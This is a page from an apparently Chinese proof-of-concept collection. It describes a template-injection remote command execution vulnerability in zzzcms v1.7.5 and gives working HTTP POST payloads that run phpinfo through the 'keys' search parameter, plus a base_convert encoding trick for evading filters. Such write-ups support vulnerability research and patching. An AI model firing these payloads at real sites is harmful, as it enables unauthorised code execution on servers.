admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/zzzcms v1.7.5 前台远程命令执行漏洞.md
Threekiii 95162cea88 update
2025-04-07 16:36:34 +08:00

749 B
Raw Blame History

zzzcms v1.7.5 前台远程命令执行漏洞

漏洞描述

zzzcms v1.7.5 parserSearch 存在模板注入导致远程命令执行漏洞。

参考链接:

漏洞影响

zzzcms v1.7.5

漏洞复现

执行 phpinfo

POST /?location=search HTTP/1.1
Host: your-ip

keys={if:=phpinfo()}{end if}

如果遇到拦截,编码绕过:

<?php
echo (base_convert("phpinfo()", 32, 10));
?>
-----
27440799224

POST /?location=search HTTP/1.1
Host: your-ip

keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}